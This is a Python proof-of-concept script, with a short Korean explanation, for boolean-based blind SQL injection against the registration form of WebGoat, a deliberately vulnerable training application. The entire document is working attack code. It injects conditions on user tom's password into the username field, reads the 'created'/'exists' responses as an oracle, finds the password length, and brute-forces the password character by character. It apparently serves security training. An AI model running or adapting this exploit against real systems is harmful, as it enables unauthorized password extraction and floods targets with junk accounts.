import string

import requests
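# Boolean-based blind SQL injection PoC against the WebGoat
# "SqlInjection/challenge" registration form.
#
# The `username_reg` field is injected with a condition on tom's password.
# The server's reply is the oracle: a body containing "created" means the
# injected condition was false, a body saying the user already "exists" /
# asks for a "different" username means it was true.
#
# Things a tester should know before running this:
#   * Every probe whose condition is FALSE makes the server answer "created",
#     i.e. it registers a throw-away user with the raw payload as its name.
#     Expect a pile of junk accounts on the target after a run.
#   * The JSESSIONID below is a dead value from the author's session. Replace
#     it with a live one; with an expired session the oracle sees neither
#     marker and the length probe aborts instead of silently running to 29.
#   * Only a-z is searched (the original iterated 0x61..0x7a). Widen CHARSET
#     if the password may hold other characters, but never put "'" in it:
#     the character is spliced into the SQL string unescaped.
#   * length()/substr() are what the original used; they are presumably the
#     functions of WebGoat's bundled database -- TODO confirm against the
#     target if ported elsewhere.
url = "http://localhost:8080/WebGoat/SqlInjection/challenge"
cookie = {'JSESSIONID': '8B10E84050C998DD12174E500DBA38F6'}

# Exclusive upper bound on the password length probe (original: range(1, 30)).
MAX_PASSWORD_LENGTH = 30
# Characters tried at each position. Must not contain a single quote.
CHARSET = string.ascii_lowercase
# Seconds to wait per request; the original had no timeout and could hang forever.
TIMEOUT = 10


def _oracle(body: str):
    """Translate one registration response body into the injected condition's truth value.

    Returns False when the body reports the user was "created" (no row matched
    the injected WHERE clause), True when it reports the user already "exists"
    or asks for a "different" username (a row matched), and None when neither
    marker is present -- e.g. an "Internal Server Error" page, a login redirect
    from an expired session, or any other unexpected page.

    "created" is tested first, exactly as the original loops did, so a page
    that happened to contain both words is classified the same way.
    """
    if 'created' in body:
        return False
    if 'exists' in body or 'different' in body:
        return True
    return None


def _length_payload(length: int) -> str:
    """Injected username asserting `length(password) = length` for user tom."""
    return "tom' and length(password) = %d and '1'='1" % length


def _char_payload(position: int, ch: str) -> str:
    """Injected username asserting the 1-based `position`-th password character is `ch`."""
    return "tom' and substr(password, %d, 1) = '%s' and '1'='1" % (position, ch)


def _probe(username: str) -> str:
    """PUT one registration attempt with `username` and return the decoded response body.

    The other form fields are fixed filler; only `username_reg` carries the
    injection. Raises whatever `requests` raises on network failure or timeout.
    """
    form = {
        'username_reg': username,
        'email_reg': 'test@test.com',
        'password_reg': '1111',
        'confirm_password_reg': '1111',
    }
    r = requests.put(url, form, cookies=cookie, timeout=TIMEOUT)
    return r.content.decode()


def _find_length(probe, max_len: int = MAX_PASSWORD_LENGTH):
    """Return tom's password length, or None if no value in 1..max_len-1 matched.

    `probe` is a callable taking the injected username and returning the
    response body (normally `_probe`; tests pass a fake). Lengths answered
    "created" are echoed as progress, like the original did.

    Raises RuntimeError when a response carries neither marker: the oracle is
    blind at that point, and the original's behaviour -- break and carry on
    with whatever counter it had -- produced a wrong length and a wasted
    brute-force run.
    """
    for length in range(1, max_len):
        body = probe(_length_payload(length))
        verdict = _oracle(body)
        if verdict is True:
            return length
        if verdict is None:
            raise RuntimeError(
                "no oracle marker in response while probing length %d:\n%s" % (length, body))
        print(length)
    return None


def _find_password(probe, length: int, charset: str = CHARSET) -> str:
    """Recover `length` password characters one position at a time.

    For each position every character of `charset` is tried in order until the
    oracle answers True. A position with no match is filled with '?' so that
    later positions stay aligned -- the original appended nothing in that case,
    shifting every later character one place to the left. Responses without a
    marker (server error) are treated as "no match for this character", as the
    original did.
    """
    recovered = []
    for position in range(1, length + 1):
        for ch in charset:
            if _oracle(probe(_char_payload(position, ch))) is True:
                recovered.append(ch)
                break
        else:
            print("[!] position %d: no character in charset matched, writing '?'" % position)
            recovered.append('?')
        print("".join(recovered))
    return "".join(recovered)


def main() -> None:
    """Run the two-stage attack: length probe, then per-position brute force."""
    print('[*] Get password length...')
    try:
        length = _find_length(_probe)
    except RuntimeError as exc:
        print("SQL ERROR")
        print(exc)
        raise SystemExit(1)
    print('[!] Done!!!')
    if length is None:
        raise SystemExit(
            "[!] no length in 1..%d answered 'exists'; is the JSESSIONID still valid?"
            % (MAX_PASSWORD_LENGTH - 1))
    print("[*] Length of password is %d" % length)
    print('[*] Hack the password')
    password = _find_password(_probe, length)
    print("[*] Tom's pw : %s" % password)


if __name__ == "__main__":
    main()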
request 패킷의 challenge에 파라미터를 보낸다. ID 부분에 blind sql injection으로 비밀번호 길이를 알아낸다. response 패킷으로 본문 내용중에 created 또는 exists 가 포함되어 있을경우 다음 로직을 처리한다. 길이를 알아낸후 Brute Force를 수행한다. a~zA~Z 문자의 범위로 비밀번호를 탐색한다 (단, 위 코드는 실제로 0x61~0x7a, 즉 소문자 a~z 만 탐색한다). 문자 비교 sql 을 만들어 blind injection을 수행한다. response의 패킷 내용을 통해 응답을 판단하고 비밀번호를 찾아내게 된다.